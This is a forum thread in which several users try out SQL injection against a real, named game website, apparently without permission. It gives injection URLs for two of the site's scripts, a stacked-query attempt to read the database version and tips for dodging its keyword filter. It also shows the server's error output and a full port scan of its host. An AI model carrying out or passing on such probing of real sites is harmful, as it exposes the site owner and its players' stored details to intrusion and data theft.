Site injectable?

[fr0wnR]

www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --
This works, I'm getting a sql error:

Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1

Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that its not injectable or am I doing something wrong?


This would be my idea with @@version:

tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --

The SQL query then:
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out

[ande]

Forbidden pages usually means some sort of filtering. Tried @@vErSion?

[fr0wnR]

Forbidden pages usually means some sort of filtering. Tried @@vErSion?

Hmm, doesnt work either..
I will try encoding it, but I dont think this will change anything.
Is it really not injectable??

[peak]

Without trying myself I can already say:

....  that corresponds to your MySQL server version for ...

...got it?

[fr0wnR]

Wait this is genius 
They have MySQL 5.0.91-community.
Will read through the changes, thank you!

[peak]

Well I took a deeper look at the vulnerability.

It is indeed injectable. But there is a simple WAF aka filtering going on. Its just the select keyword "from" that gets filtered and /etc/passwd as I noticed but nothing else so far.

Conclusion: You cannot bypass the keyword "from" and you don't have file privileges. You can extract the information about the player table with the given Select statement but beside that there is no exploitation by sqli possible on this parameter.

Apache is 1.3.41 though ...

cheers

[fr0wnR]

Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.

Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
 Interesting ports on 69.36.8.247:
 Not shown: 976 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp ProFTPD 1.3.3c
 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
 25/tcp open smtp Courier smtpd
 26/tcp open smtp Courier smtpd
 53/tcp open domain ISC BIND 9.2.4
 80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 110/tcp open pop3 Courier pop3d
 135/tcp filtered msrpc
 139/tcp filtered netbios-ssn
 143/tcp open imap Courier Imapd (released 2010)
 443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 445/tcp filtered microsoft-ds
 587/tcp open smtp Courier smtpd
 993/tcp open ssl/imaps?
 995/tcp open ssl/pop3s?
 3000/tcp open http ServerCP httpd
 3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 3306/tcp open mysql MySQL 5.0.91-community
 4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
 5432/tcp open postgresql PostgreSQL DB
 6666/tcp filtered irc
 6667/tcp filtered irc
 6668/tcp filtered irc
 6669/tcp filtered irc
 Service Info: Host: server2.tantrix.com; OS: Unix


Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds

[peak]

How did you find out which keywords are getting filtered out? Just trying or software?

Comment out the rest of the string and type your keywords into the comment part.

... 1,2,3,4,5 -- xx  from

By the way: Just by clicking around I already found an orderby injection:

http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain